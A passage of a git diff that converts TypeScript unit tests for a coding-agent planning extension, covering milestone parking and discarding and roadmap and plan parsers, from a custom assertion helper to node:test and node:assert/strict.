-      assert(!existsSync(mDir), 'milestone dir removed after discard');
+      assert.ok(success, 'discardMilestone returns true');
+      assert.ok(!existsSync(mDir), 'milestone dir removed after discard');
 
       const state = await deriveState(base);
-      assert(!state.registry.some(e => e.id === 'M001'), 'M001 not in registry after discard');
+      assert.ok(!state.registry.some(e => e.id === 'M001'), 'M001 not in registry after discard');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 11: discardMilestone updates queue order ────────────────────
-  console.log('\n=== discardMilestone updates queue order ===');
-  {
+test('discardMilestone updates queue order', () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -315,16 +287,15 @@ async function main(): Promise<void> {
 
       // Queue order should no longer include M001
       const queueContent = JSON.parse(readFileSync(queuePath, 'utf-8'));
-      assert(!queueContent.order.includes('M001'), 'M001 removed from queue order');
-      assert(queueContent.order.includes('M002'), 'M002 still in queue order');
+      assert.ok(!queueContent.order.includes('M001'), 'M001 removed from queue order');
+      assert.ok(queueContent.order.includes('M002'), 'M002 still in queue order');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 12: All milestones parked → no active milestone ─────────────
-  console.log('\n=== All milestones parked → no active ===');
-  {
+test('All milestones parked → no active', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -333,18 +304,17 @@ async function main(): Promise<void> {
       parkMilestone(base, 'M001', 'Testing');
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone, null, 'no active milestone when all parked');
-      assertEq(state.phase, 'pre-planning', 'phase is pre-planning');
-      assert(state.registry.length === 1, 'registry still has 1 entry');
-      assertEq(state.registry[0]?.status, 'parked', 'entry is parked');
+      assert.deepStrictEqual(state.activeMilestone, null, 'no active milestone when all parked');
+      assert.deepStrictEqual(state.phase, 'pre-planning', 'phase is pre-planning');
+      assert.ok(state.registry.length === 1, 'registry still has 1 entry');
+      assert.deepStrictEqual(state.registry[0]?.status, 'parked', 'entry is parked');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 13: Parked milestone without roadmap ────────────────────────
-  console.log('\n=== Park milestone without roadmap ===');
-  {
+test('Park milestone without roadmap', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001'); // No roadmap
@@ -354,16 +324,15 @@ async function main(): Promise<void> {
       parkMilestone(base, 'M001', 'Not ready yet');
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone?.id, 'M002', 'M002 is active when M001 (no roadmap) is parked');
-      assertEq(state.registry.find(e => e.id === 'M001')?.status, 'parked', 'M001 is parked');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'M002 is active when M001 (no roadmap) is parked');
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M001')?.status, 'parked', 'M001 is parked');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 14: Progress counts with parked milestone ───────────────────
-  console.log('\n=== Progress counts with parked ===');
-  {
+test('Progress counts with parked', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true, withSummary: true }); // complete
@@ -374,28 +343,12 @@ async function main(): Promise<void> {
       parkMilestone(base, 'M002', 'Parked');
 
       const state = await deriveState(base);
-      assertEq(state.progress?.milestones.done, 1, '1 complete milestone');
-      assertEq(state.progress?.milestones.total, 3, '3 total milestones (including parked)');
-      assertEq(state.activeMilestone?.id, 'M003', 'M003 is active');
+      assert.deepStrictEqual(state.progress?.milestones.done, 1, '1 complete milestone');
+      assert.deepStrictEqual(state.progress?.milestones.total, 3, '3 total milestones (including parked)');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M003', 'M003 is active');
     } finally {
       cleanup(base);
     }
-  }
-
-  // ═══════════════════════════════════════════════════════════════════════════
-  // Results
-  // ═══════════════════════════════════════════════════════════════════════════
-
-  console.log(`\n${'='.repeat(40)}`);
-  console.log(`Results: ${passed} passed, ${failed} failed`);
-  if (failed > 0) {
-    process.exit(1);
-  } else {
-    console.log('All tests passed ✓');
-  }
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+});
+
 });
diff --git a/src/resources/extensions/gsd/tests/parsers.test.ts b/src/resources/extensions/gsd/tests/parsers.test.ts
index 144b95857..0c727b7ec 100644
--- a/src/resources/extensions/gsd/tests/parsers.test.ts
+++ b/src/resources/extensions/gsd/tests/parsers.test.ts
@@ -1,13 +1,14 @@
-import { parseRoadmap, parsePlan, parseTaskPlanFile, parseSummary, parseContinue, parseRequirementCounts, parseSecretsManifest, formatSecretsManifest } from '../files.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { parseRoadmap, parsePlan } from '../parsers-legacy.ts';
+import { parseTaskPlanFile, parseSummary, parseContinue, parseRequirementCounts, parseSecretsManifest, formatSecretsManifest } from '../files.ts';
 // ═══════════════════════════════════════════════════════════════════════════
 // parseRoadmap tests
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseRoadmap: full roadmap ===');
-{
+
+describe('parsers', () => {
+test('parseRoadmap: full roadmap', () => {
   const content = `# M001: GSD Extension — Hierarchical Planning
 
 **Vision:** Build a structured planning system for coding agents.
@@ -56,44 +57,43 @@ Consumes from S03:
 
   const r = parseRoadmap(content);
 
-  assertEq(r.title, 'M001: GSD Extension — Hierarchical Planning', 'roadmap title');
-  assertEq(r.vision, 'Build a structured planning system for coding agents.', 'roadmap vision');
-  assertEq(r.successCriteria.length, 3, 'success criteria count');
-  assertEq(r.successCriteria[0], 'All parsers have test coverage', 'first success criterion');
-  assertEq(r.successCriteria[2], 'State derivation works correctly', 'third success criterion');
+  assert.deepStrictEqual(r.title, 'M001: GSD Extension — Hierarchical Planning', 'roadmap title');
+  assert.deepStrictEqual(r.vision, 'Build a structured planning system for coding agents.', 'roadmap vision');
+  assert.deepStrictEqual(r.successCriteria.length, 3, 'success criteria count');
+  assert.deepStrictEqual(r.successCriteria[0], 'All parsers have test coverage', 'first success criterion');
+  assert.deepStrictEqual(r.successCriteria[2], 'State derivation works correctly', 'third success criterion');
 
   // Slices
-  assertEq(r.slices.length, 3, 'slice count');
+  assert.deepStrictEqual(r.slices.length, 3, 'slice count');
 
-  assertEq(r.slices[0].id, 'S01', 'S01 id');
-  assertEq(r.slices[0].title, 'Types + File I/O', 'S01 title');
-  assertEq(r.slices[0].risk, 'low', 'S01 risk');
-  assertEq(r.slices[0].depends, [], 'S01 depends');
-  assertEq(r.slices[0].done, true, 'S01 done');
-  assertEq(r.slices[0].demo, 'All types defined and parsers work.', 'S01 demo');
+  assert.deepStrictEqual(r.slices[0].id, 'S01', 'S01 id');
+  assert.deepStrictEqual(r.slices[0].title, 'Types + File I/O', 'S01 title');
+  assert.deepStrictEqual(r.slices[0].risk, 'low', 'S01 risk');
+  assert.deepStrictEqual(r.slices[0].depends, [], 'S01 depends');
+  assert.deepStrictEqual(r.slices[0].done, true, 'S01 done');
+  assert.deepStrictEqual(r.slices[0].demo, 'All types defined and parsers work.', 'S01 demo');
 
-  assertEq(r.slices[1].id, 'S02', 'S02 id');
-  assertEq(r.slices[1].title, 'State Derivation', 'S02 title');
-  assertEq(r.slices[1].risk, 'medium', 'S02 risk');
-  assertEq(r.slices[1].depends, ['S01'], 'S02 depends');
-  assertEq(r.slices[1].done, false, 'S02 done');
+  assert.deepStrictEqual(r.slices[1].id, 'S02', 'S02 id');
+  assert.deepStrictEqual(r.slices[1].title, 'State Derivation', 'S02 title');
+  assert.deepStrictEqual(r.slices[1].risk, 'medium', 'S02 risk');
+  assert.deepStrictEqual(r.slices[1].depends, ['S01'], 'S02 depends');
+  assert.deepStrictEqual(r.slices[1].done, false, 'S02 done');
 
-  assertEq(r.slices[2].id, 'S03', 'S03 id');
-  assertEq(r.slices[2].risk, 'high', 'S03 risk');
-  assertEq(r.slices[2].depends, ['S01', 'S02'], 'S03 depends');
-  assertEq(r.slices[2].done, false, 'S03 done');
+  assert.deepStrictEqual(r.slices[2].id, 'S03', 'S03 id');
+  assert.deepStrictEqual(r.slices[2].risk, 'high', 'S03 risk');
+  assert.deepStrictEqual(r.slices[2].depends, ['S01', 'S02'], 'S03 depends');
+  assert.deepStrictEqual(r.slices[2].done, false, 'S03 done');
 
   // Boundary map
-  assertEq(r.boundaryMap.length, 2, 'boundary map entry count');
-  assertEq(r.boundaryMap[0].fromSlice, 'S01', 'bm[0] from');
-  assertEq(r.boundaryMap[0].toSlice, 'S02', 'bm[0] to');
-  assertTrue(r.boundaryMap[0].produces.includes('types.ts'), 'bm[0] produces mentions types.ts');
-  assertEq(r.boundaryMap[1].fromSlice, 'S02', 'bm[1] from');
-  assertEq(r.boundaryMap[1].toSlice, 'S03', 'bm[1] to');
-}
+  assert.deepStrictEqual(r.boundaryMap.length, 2, 'boundary map entry count');
+  assert.deepStrictEqual(r.boundaryMap[0].fromSlice, 'S01', 'bm[0] from');
+  assert.deepStrictEqual(r.boundaryMap[0].toSlice, 'S02', 'bm[0] to');
+  assert.ok(r.boundaryMap[0].produces.includes('types.ts'), 'bm[0] produces mentions types.ts');
+  assert.deepStrictEqual(r.boundaryMap[1].fromSlice, 'S02', 'bm[1] from');
+  assert.deepStrictEqual(r.boundaryMap[1].toSlice, 'S03', 'bm[1] to');
+});
 
-console.log('\n=== parseRoadmap: empty slices section ===');
-{
+test('parseRoadmap: empty slices section', () => {
   const content = `# M002: Empty Milestone
 
 **Vision:** Nothing yet.
@@ -104,13 +104,12 @@ console.log('\n=== parseRoadmap: empty slices section ===');
 `;
 
   const r = parseRoadmap(content);
-  assertEq(r.title, 'M002: Empty Milestone', 'title with empty slices');
-  assertEq(r.slices.length, 0, 'no slices parsed');
-  assertEq(r.boundaryMap.length, 0, 'no boundary map entries');
-}
+  assert.deepStrictEqual(r.title, 'M002: Empty Milestone', 'title with empty slices');
+  assert.deepStrictEqual(r.slices.length, 0, 'no slices parsed');
+  assert.deepStrictEqual(r.boundaryMap.length, 0, 'no boundary map entries');
+});
 
-console.log('\n=== parseRoadmap: malformed checkbox lines ===');
-{
+test('parseRoadmap: malformed checkbox lines', () => {
   // Lines that don't match the expected bold pattern should be skipped
   const content = `# M003: Malformed
 
@@ -129,15 +128,14 @@ console.log('\n=== parseRoadmap: malformed checkbox lines ===');
 
   const r = parseRoadmap(content);
   // Only S02 and S03 should be parsed (malformed lines without bold markers are skipped)
-  assertEq(r.slices.length, 2, 'only valid slices parsed from malformed input');
-  assertEq(r.slices[0].id, 'S02', 'first valid slice is S02');
-  assertEq(r.slices[0].done, true, 'S02 done');
-  assertEq(r.slices[1].id, 'S03', 'second valid slice is S03');
-  assertEq(r.slices[1].depends, ['S02'], 'S03 depends on S02');
-}
+  assert.deepStrictEqual(r.slices.length, 2, 'only valid slices parsed from malformed input');
+  assert.deepStrictEqual(r.slices[0].id, 'S02', 'first valid slice is S02');
+  assert.deepStrictEqual(r.slices[0].done, true, 'S02 done');
+  assert.deepStrictEqual(r.slices[1].id, 'S03', 'second valid slice is S03');
+  assert.deepStrictEqual(r.slices[1].depends, ['S02'], 'S03 depends on S02');
+});
 
-console.log('\n=== parseRoadmap: lowercase vs uppercase X for done ===');
-{
+test('parseRoadmap: lowercase vs uppercase X for done', () => {
   const content = `# M004: Case Test
 
 **Vision:** Test X case sensitivity.
@@ -155,14 +153,13 @@ console.log('\n=== parseRoadmap: lowercase vs uppercase X for done ===');
 `;
 
   const r = parseRoadmap(content);
-  assertEq(r.slices.length, 3, 'all three slices parsed');
-  assertEq(r.slices[0].done, true, 'lowercase x is done');
-  assertEq(r.slices[1].done, true, 'uppercase X is done');
-  assertEq(r.slices[2].done, false, 'space is not done');
-}
+  assert.deepStrictEqual(r.slices.length, 3, 'all three slices parsed');
+  assert.deepStrictEqual(r.slices[0].done, true, 'lowercase x is done');
+  assert.deepStrictEqual(r.slices[1].done, true, 'uppercase X is done');
+  assert.deepStrictEqual(r.slices[2].done, false, 'space is not done');
+});
 
-console.log('\n=== parseRoadmap: missing boundary map ===');
-{
+test('parseRoadmap: missing boundary map', () => {
   const content = `# M005: No Boundary Map
 
 **Vision:** A roadmap without a boundary map section.
@@ -179,29 +176,27 @@ console.log('\n=== parseRoadmap: missing boundary map ===');
 `;
 
   const r = parseRoadmap(content);
-  assertEq(r.title, 'M005: No Boundary Map', 'title');
-  assertEq(r.slices.length, 1, 'one slice');
-  assertEq(r.boundaryMap.length, 0, 'empty boundary map when section missing');
-  assertEq(r.successCriteria.length, 1, 'one success criterion');
-}
+  assert.deepStrictEqual(r.title, 'M005: No Boundary Map', 'title');
+  assert.deepStrictEqual(r.slices.length, 1, 'one slice');
+  assert.deepStrictEqual(r.boundaryMap.length, 0, 'empty boundary map when section missing');
+  assert.deepStrictEqual(r.successCriteria.length, 1, 'one success criterion');
+});
 
-console.log('\n=== parseRoadmap: no sections at all ===');
-{
+test('parseRoadmap: no sections at all', () => {
   const content = `# M006: Bare Minimum
 
 Just a title and nothing else.
 `;
 
   const r = parseRoadmap(content);
-  assertEq(r.title, 'M006: Bare Minimum', 'title from bare roadmap');
-  assertEq(r.vision, '', 'empty vision');
-  assertEq(r.successCriteria.length, 0, 'no success criteria');
-  assertEq(r.slices.length, 0, 'no slices');
-  assertEq(r.boundaryMap.length, 0, 'no boundary map');
-}
+  assert.deepStrictEqual(r.title, 'M006: Bare Minimum', 'title from bare roadmap');
+  assert.deepStrictEqual(r.vision, '', 'empty vision');
+  assert.deepStrictEqual(r.successCriteria.length, 0, 'no success criteria');
+  assert.deepStrictEqual(r.slices.length, 0, 'no slices');
+  assert.deepStrictEqual(r.boundaryMap.length, 0, 'no boundary map');
+});
 
-console.log('\n=== parseRoadmap: slice with no demo blockquote ===');
-{
+test('parseRoadmap: slice with no demo blockquote', () => {
   const content = `# M007: No Demo
 
 **Vision:** Testing slices without demo lines.
@@ -213,13 +208,12 @@ console.log('\n=== parseRoadmap: slice with no demo blockquote ===');
 `;
 
   const r = parseRoadmap(content);
-  assertEq(r.slices.length, 2, 'two slices without demos');
-  assertEq(r.slices[0].demo, '', 'S01 demo empty');
-  assertEq(r.slices[1].demo, '', 'S02 demo empty');
-}
+  assert.deepStrictEqual(r.slices.length, 2, 'two slices without demos');
+  assert.deepStrictEqual(r.slices[0].demo, '', 'S01 demo empty');
+  assert.deepStrictEqual(r.slices[1].demo, '', 'S02 demo empty');
+});
 
-console.log('\n=== parseRoadmap: missing risk defaults to low ===');
-{
+test('parseRoadmap: missing risk defaults to low', () => {
   const content = `# M008: Default Risk
 
 **Vision:** Test default risk.
@@ -231,16 +225,14 @@ console.log('\n=== parseRoadmap: missing risk defaults to low ===');
 `;
 
   const r = parseRoadmap(content);
-  assertEq(r.slices.length, 1, 'one slice');
-  assertEq(r.slices[0].risk, 'low', 'default risk is low');
-}
+  assert.deepStrictEqual(r.slices.length, 1, 'one slice');
+  assert.deepStrictEqual(r.slices[0].risk, 'low', 'default risk is low');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // parsePlan tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== parsePlan: full plan ===');
-{
+test('parsePlan: full plan', () => {
   const content = `---
 estimated_steps: 6
 estimated_files: 3
@@ -276,42 +268,41 @@ skills_used:
 `;
 
   const taskPlan = parseTaskPlanFile(content);
-  assertEq(taskPlan.frontmatter.estimated_steps, 6, 'task plan frontmatter estimated_steps');
-  assertEq(taskPlan.frontmatter.estimated_files, 3, 'task plan frontmatter estimated_files');
-  assertEq(taskPlan.frontmatter.skills_used.length, 2, 'task plan frontmatter skills_used count');
-  assertEq(taskPlan.frontmatter.skills_used[0], 'typescript', 'first task plan skill');
-  assertEq(taskPlan.frontmatter.skills_used[1], 'testing', 'second task plan skill');
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_steps, 6, 'task plan frontmatter estimated_steps');
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_files, 3, 'task plan frontmatter estimated_files');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used.length, 2, 'task plan frontmatter skills_used count');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used[0], 'typescript', 'first task plan skill');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used[1], 'testing', 'second task plan skill');
 
   const p = parsePlan(content);
 
-  assertEq(p.id, 'S01', 'plan id');
-  assertEq(p.title, 'Parser Test Suite', 'plan title');
-  assertEq(p.goal, 'All 5 parsers have test coverage with edge cases.', 'plan goal');
-  assertEq(p.demo, '`node --test tests/parsers.test.ts` passes with zero failures.', 'plan demo');
+  assert.deepStrictEqual(p.id, 'S01', 'plan id');
+  assert.deepStrictEqual(p.title, 'Parser Test Suite', 'plan title');
+  assert.deepStrictEqual(p.goal, 'All 5 parsers have test coverage with edge cases.', 'plan goal');
+  assert.deepStrictEqual(p.demo, '`node --test tests/parsers.test.ts` passes with zero failures.', 'plan demo');
 
   // Must-haves
-  assertEq(p.mustHaves.length, 3, 'must-have count');
-  assertEq(p.mustHaves[0], 'parseRoadmap tests cover happy path and edge cases', 'first must-have');
+  assert.deepStrictEqual(p.mustHaves.length, 3, 'must-have count');
+  assert.deepStrictEqual(p.mustHaves[0], 'parseRoadmap tests cover happy path and edge cases', 'first must-have');
 
   // Tasks
-  assertEq(p.tasks.length, 2, 'task count');
+  assert.deepStrictEqual(p.tasks.length, 2, 'task count');
 
-  assertEq(p.tasks[0].id, 'T01', 'T01 id');
-  assertEq(p.tasks[0].title, 'Test parseRoadmap and parsePlan', 'T01 title');
-  assertEq(p.tasks[0].done, false, 'T01 not done');
-  assertTrue(p.tasks[0].description.includes('comprehensive tests'), 'T01 description content');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'T01 id');
+  assert.deepStrictEqual(p.tasks[0].title, 'Test parseRoadmap and parsePlan', 'T01 title');
+  assert.deepStrictEqual(p.tasks[0].done, false, 'T01 not done');
+  assert.ok(p.tasks[0].description.includes('comprehensive tests'), 'T01 description content');
 
-  assertEq(p.tasks[1].id, 'T02', 'T02 id');
-  assertEq(p.tasks[1].title, 'Test parseSummary and parseContinue', 'T02 title');
-  assertEq(p.tasks[1].done, true, 'T02 done');
+  assert.deepStrictEqual(p.tasks[1].id, 'T02', 'T02 id');
+  assert.deepStrictEqual(p.tasks[1].title, 'Test parseSummary and parseContinue', 'T02 title');
+  assert.deepStrictEqual(p.tasks[1].done, true, 'T02 done');
 
   // Files likely touched
-  assertEq(p.filesLikelyTouched.length, 3, 'files likely touched count');
-  assertTrue(p.filesLikelyTouched[0].includes('tests/parsers.test.ts'), 'first file');
-}
+  assert.deepStrictEqual(p.filesLikelyTouched.length, 3, 'files likely touched count');
+  assert.ok(p.filesLikelyTouched[0].includes('tests/parsers.test.ts'), 'first file');
+});
 
-console.log('\n=== parseTaskPlanFile: defaults missing frontmatter fields ===');
-{
+test('parseTaskPlanFile: defaults missing frontmatter fields', () => {
   const content = `# T01: Minimal task plan
 
 ## Description
@@ -320,13 +311,12 @@ No frontmatter here.
 `;
 
   const taskPlan = parseTaskPlanFile(content);
-  assertEq(taskPlan.frontmatter.estimated_steps, undefined, 'estimated_steps defaults undefined');
-  assertEq(taskPlan.frontmatter.estimated_files, undefined, 'estimated_files defaults undefined');
-  assertEq(taskPlan.frontmatter.skills_used.length, 0, 'skills_used defaults empty array');
-}
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_steps, undefined, 'estimated_steps defaults undefined');
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_files, undefined, 'estimated_files defaults undefined');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used.length, 0, 'skills_used defaults empty array');
+});
 
-console.log('\n=== parseTaskPlanFile: accepts scalar skills_used and numeric strings ===');
-{
+test('parseTaskPlanFile: accepts scalar skills_used and numeric strings', () => {
   const content = `---
 estimated_steps: "9"
 estimated_files: "4"
@@ -337,14 +327,13 @@ skills_used: react-best-practices
 `;
 
   const taskPlan = parseTaskPlanFile(content);
-  assertEq(taskPlan.frontmatter.estimated_steps, 9, 'string estimated_steps parsed');
-  assertEq(taskPlan.frontmatter.estimated_files, 4, 'string estimated_files parsed');
-  assertEq(taskPlan.frontmatter.skills_used.length, 1, 'scalar skills_used normalized to array');
-  assertEq(taskPlan.frontmatter.skills_used[0], 'react-best-practices', 'scalar skill preserved');
-}
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_steps, 9, 'string estimated_steps parsed');
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_files, 4, 'string estimated_files parsed');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used.length, 1, 'scalar skills_used normalized to array');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used[0], 'react-best-practices', 'scalar skill preserved');
+});
 
-console.log('\n=== parseTaskPlanFile: filters blank skills_used items ===');
-{
+test('parseTaskPlanFile: filters blank skills_used items', () => {
   const content = `---
 skills_used:
   - react
@@ -356,13 +345,12 @@ skills_used:
 `;
 
   const taskPlan = parseTaskPlanFile(content);
-  assertEq(taskPlan.frontmatter.skills_used.length, 2, 'blank skill entries removed');
-  assertEq(taskPlan.frontmatter.skills_used[0], 'react', 'first remaining skill');
-  assertEq(taskPlan.frontmatter.skills_used[1], 'testing', 'second remaining skill');
-}
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used.length, 2, 'blank skill entries removed');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used[0], 'react', 'first remaining skill');
+  assert.deepStrictEqual(taskPlan.frontmatter.skills_used[1], 'testing', 'second remaining skill');
+});
 
-console.log('\n=== parseTaskPlanFile: invalid numeric frontmatter ignored ===');
-{
+test('parseTaskPlanFile: invalid numeric frontmatter ignored', () => {
   const content = `---
 estimated_steps: many
 estimated_files: unknown
@@ -372,12 +360,11 @@ estimated_files: unknown
 `;
 
   const taskPlan = parseTaskPlanFile(content);
-  assertEq(taskPlan.frontmatter.estimated_steps, undefined, 'invalid estimated_steps ignored');
-  assertEq(taskPlan.frontmatter.estimated_files, undefined, 'invalid estimated_files ignored');
-}
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_steps, undefined, 'invalid estimated_steps ignored');
+  assert.deepStrictEqual(taskPlan.frontmatter.estimated_files, undefined, 'invalid estimated_files ignored');
+});
 
-console.log('\n=== parseTaskPlanFile: parsePlan ignores task-plan frontmatter ===');
-{
+test('parseTaskPlanFile: parsePlan ignores task-plan frontmatter', () => {
   const content = `---
 estimated_steps: 2
 estimated_files: 1
@@ -397,12 +384,11 @@ skills_used:
 `;
 
   const p = parsePlan(content);
-  assertEq(p.id, 'S11', 'plan id still parsed with frontmatter');
-  assertEq(p.tasks.length, 1, 'task still parsed with frontmatter');
-}
+  assert.deepStrictEqual(p.id, 'S11', 'plan id still parsed with frontmatter');
+  assert.deepStrictEqual(p.tasks.length, 1, 'task still parsed with frontmatter');
+});
 
-console.log('\n=== parsePlan: multi-line task description concatenation ===');
-{
+test('parsePlan: multi-line task description concatenation', () => {
   const content = `# S02: Multi-line Test
 
 **Goal:** Test multi-line descriptions.
@@ -429,16 +415,15 @@ console.log('\n=== parsePlan: multi-line task description concatenation ===');
 
   const p = parsePlan(content);
 
-  assertEq(p.tasks.length, 2, 'two tasks');
-  assertTrue(p.tasks[0].description.includes('First line'), 'T01 desc has first line');
-  assertTrue(p.tasks[0].description.includes('Second line'), 'T01 desc has second line');
-  assertTrue(p.tasks[0].description.includes('Third line'), 'T01 desc has third line');
-  assertTrue(p.tasks[0].description.includes('description. Second'), 'lines joined with space');
-  assertEq(p.tasks[1].description, 'Just one line.', 'T02 single-line desc');
-}
+  assert.deepStrictEqual(p.tasks.length, 2, 'two tasks');
+  assert.ok(p.tasks[0].description.includes('First line'), 'T01 desc has first line');
+  assert.ok(p.tasks[0].description.includes('Second line'), 'T01 desc has second line');
+  assert.ok(p.tasks[0].description.includes('Third line'), 'T01 desc has third line');
+  assert.ok(p.tasks[0].description.includes('description. Second'), 'lines joined with space');
+  assert.deepStrictEqual(p.tasks[1].description, 'Just one line.', 'T02 single-line desc');
+});
 
-console.log('\n=== parsePlan: frontmatter does not pollute task descriptions ===');
-{
+test('parsePlan: frontmatter does not pollute task descriptions', () => {
   const content = `---
 estimated_steps: 2
 estimated_files: 1
@@ -456,12 +441,11 @@ skills_used:
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 1, 'one task parsed with frontmatter');
-  assertEq(p.tasks[0].description, 'First line of description. Second line of description.', 'frontmatter excluded from description');
-}
+  assert.deepStrictEqual(p.tasks.length, 1, 'one task parsed with frontmatter');
+  assert.deepStrictEqual(p.tasks[0].description, 'First line of description. Second line of description.', 'frontmatter excluded from description');
+});
 
-console.log('\n=== parsePlan: task with missing estimate ===');
-{
+test('parsePlan: task with missing estimate', () => {
   const content = `# S03: No Estimate
 
 **Goal:** Handle tasks without estimates.
@@ -477,15 +461,14 @@ console.log('\n=== parsePlan: task with missing estimate ===');
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 2, 'two tasks parsed');
-  assertEq(p.tasks[0].id, 'T01', 'T01 id');
-  assertEq(p.tasks[0].title, 'No Estimate Task', 'T01 title without estimate');
-  assertEq(p.tasks[0].done, false, 'T01 not done');
-  assertEq(p.tasks[1].id, 'T02', 'T02 id');
-}
+  assert.deepStrictEqual(p.tasks.length, 2, 'two tasks parsed');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'T01 id');
+  assert.deepStrictEqual(p.tasks[0].title, 'No Estimate Task', 'T01 title without estimate');
+  assert.deepStrictEqual(p.tasks[0].done, false, 'T01 not done');
+  assert.deepStrictEqual(p.tasks[1].id, 'T02', 'T02 id');
+});
 
-console.log('\n=== parsePlan: empty tasks section ===');
-{
+test('parsePlan: empty tasks section', () => {
   const content = `# S04: Empty Tasks
 
 **Goal:** No tasks yet.
@@ -503,14 +486,13 @@ console.log('\n=== parsePlan: empty tasks section ===');
 `;
 
   const p = parsePlan(content);
-  assertEq(p.id, 'S04', 'plan id with empty tasks');
-  assertEq(p.tasks.length, 0, 'no tasks');
-  assertEq(p.mustHaves.length, 1, 'one must-have');
-  assertEq(p.filesLikelyTouched.length, 1, 'one file');
-}
+  assert.deepStrictEqual(p.id, 'S04', 'plan id with empty tasks');
+  assert.deepStrictEqual(p.tasks.length, 0, 'no tasks');
+  assert.deepStrictEqual(p.mustHaves.length, 1, 'one must-have');
+  assert.deepStrictEqual(p.filesLikelyTouched.length, 1, 'one file');
+});
 
-console.log('\n=== parsePlan: no H1 ===');
-{
+test('parsePlan: no H1', () => {
   const content = `**Goal:** A plan without a heading.
 **Demo:** Still parses.
 
@@ -521,15 +503,14 @@ console.log('\n=== parsePlan: no H1 ===');
 `;
 
   const p = parsePlan(content);
-  assertEq(p.id, '', 'empty id without H1');
-  assertEq(p.title, '', 'empty title without H1');
-  assertEq(p.goal, 'A plan without a heading.', 'goal still parsed');
-  assertEq(p.tasks.length, 1, 'task still parsed');
-  assertEq(p.tasks[0].id, 'T01', 'task id');
-}
+  assert.deepStrictEqual(p.id, '', 'empty id without H1');
+  assert.deepStrictEqual(p.title, '', 'empty title without H1');
+  assert.deepStrictEqual(p.goal, 'A plan without a heading.', 'goal still parsed');
+  assert.deepStrictEqual(p.tasks.length, 1, 'task still parsed');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'task id');
+});
 
-console.log('\n=== parsePlan: task estimate backtick in description ===');
-{
+test('parsePlan: task estimate backtick in description', () => {
   const content = `# S05: Estimate Handling
 
 **Goal:** Test estimate text handling.
@@ -542,14 +523,13 @@ console.log('\n=== parsePlan: task estimate backtick in description ===');
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 1, 'one task');
-  assertEq(p.tasks[0].id, 'T01', 'task id');
-  assertEq(p.tasks[0].title, 'With Estimate', 'title excludes estimate');
-  assertTrue(p.tasks[0].description.includes('Main description'), 'description from continuation line');
-}
+  assert.deepStrictEqual(p.tasks.length, 1, 'one task');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'task id');
+  assert.deepStrictEqual(p.tasks[0].title, 'With Estimate', 'title excludes estimate');
+  assert.ok(p.tasks[0].description.includes('Main description'), 'description from continuation line');
+});
 
-console.log('\n=== parsePlan: uppercase X for done ===');
-{
+test('parsePlan: uppercase X for done', () => {
   const content = `# S06: Case Test
 
 **Goal:** Test case.
@@ -565,12 +545,11 @@ console.log('\n=== parsePlan: uppercase X for done ===');
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks[0].done, true, 'uppercase X is done');
-  assertEq(p.tasks[1].done, true, 'lowercase x is done');
-}
+  assert.deepStrictEqual(p.tasks[0].done, true, 'uppercase X is done');
+  assert.deepStrictEqual(p.tasks[1].done, true, 'lowercase x is done');
+});
 
-console.log('\n=== parsePlan: no Must-Haves section ===');
-{
+test('parsePlan: no Must-Haves section', () => {
   const content = `# S07: No Must-Haves
 
 **Goal:** Test missing must-haves.
@@ -583,12 +562,11 @@ console.log('\n=== parsePlan: no Must-Haves section ===');
 `;
 
   const p = parsePlan(content);
-  assertEq(p.mustHaves.length, 0, 'empty must-haves');
-  assertEq(p.tasks.length, 1, 'task still parsed');
-}
+  assert.deepStrictEqual(p.mustHaves.length, 0, 'empty must-haves');
+  assert.deepStrictEqual(p.tasks.length, 1, 'task still parsed');
+});
 
-console.log('\n=== parsePlan: no Files Likely Touched section ===');
-{
+test('parsePlan: no Files Likely Touched section', () => {
   const content = `# S08: No Files
 
 **Goal:** Test missing files section.
@@ -601,11 +579,10 @@ console.log('\n=== parsePlan: no Files Likely Touched section ===');
 `;
 
   const p = parsePlan(content);
